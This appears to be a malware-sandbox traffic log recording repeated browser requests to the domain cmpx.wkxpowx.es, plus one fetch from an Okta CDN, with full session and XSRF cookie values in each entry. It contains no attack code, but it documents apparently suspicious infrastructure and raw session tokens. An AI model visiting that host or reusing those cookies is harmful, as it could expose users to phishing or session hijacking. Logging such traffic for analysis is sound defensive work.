              Source: global trafficHTTP traffic detected: GET /uvCTt0c1WaXaulifFF5YCxQIjTQDMS4UstLvEt7Nk6ABarydmvw12129 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qr9QIecbeEgJj5NBiaefPn1PwG3wIZS2AYCWQWz1l267140 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnyOxM8qSmFU00sOuniLuvsakvsYGahoCnGALnbnOQF78145 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /klzbccjV1SmFBhGV9cByzcrYZ5zenfi53pkqL956170 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvCTt0c1WaXaulifFF5YCxQIjTQDMS4UstLvEt7Nk6ABarydmvw12129 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qr9QIecbeEgJj5NBiaefPn1PwG3wIZS2AYCWQWz1l267140 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxR5XdjT2i6phfQCt7Snjrv87gNS9cpVl6Q1kCACmnyFMUy5aJIPGsJPmJ90180 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rsaQXvGfU1axx6WABYbvquvK7C8KGyb304Bp8jef193 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnyOxM8qSmFU00sOuniLuvsakvsYGahoCnGALnbnOQF78145 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijOm9RWO013RdqRPhpzqySqtmrNfhRdyG7mn5TCTBmCwOplM5Rv7ef210 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opgLF9wAyZQBttvEuoD14qTO8Jk0znpamTRxQutCj4RuvyhjkGZfdZ1DMzo8mQvaWa62F6Ny1vWMkef233 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rsaQXvGfU1axx6WABYbvquvK7C8KGyb304Bp8jef193 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stCF2div2RQ92RDQ4FChT8dTJt1y4Glx2ZZsQQ8tAEL7wCmn2NLKaRgwYNKcP2K5pv3bM8LDFUucEukQEsef254 HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZBdmNCdGwxSHZ2czJvSS8yM0FzVXc9PSIsInZhbHVlIjoiV0d6SXBNVWxCSEIzMUdTd1dUbnFYTVNFMkZRUXBIa0Q0RzZhbC9QaDdQMXZqajhlcHVIRlZJS1NMZi9HdUcwMHdzbGhqZmQreUhWM3ZPLzZGN0FKVVhLN1dSMG0vY3NzcjdZOHgvak50MXo3T2xZZnU0UEowOXh3QXVYOVhmZS8iLCJtYWMiOiIyNjExMjg1Mjk0Yzk2MTNmMzkyYjQ4ZjY5MmUyY2RmMGY4ZjQzMTQ4MzFkOGI1ODgyZTVlNjE2OGE3ZmZkMzRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldydjJtVlNLR1k0aSt0ZVQ2bHFPemc9PSIsInZhbHVlIjoiOUVHMHlwQlZNSzBJa3NmSmpYWXVsMTZLc1Zsb29oYjdjOFdVYlBDNHpqSnRkbGpjTkgrcTVUeHp5QVpham9UcFlPeVJtend1b1ZsRjdRUjROREtYK3IxTWZveFQ4M0E1VmQzMTgrY3hEYXhzRzZIUHhVL0xnYmlaZEpDQ2dkN3MiLCJtYWMiOiI1MjBkYzY5NTA1YzE1OGU2YmFhNGQ1ZTZmMjBjMDljNTFhYmNiZjhmMmRjMzQ5NjM3YzhlNDc2MTJhNWQxMmVlIiwidGFnIjoiIn0%3D
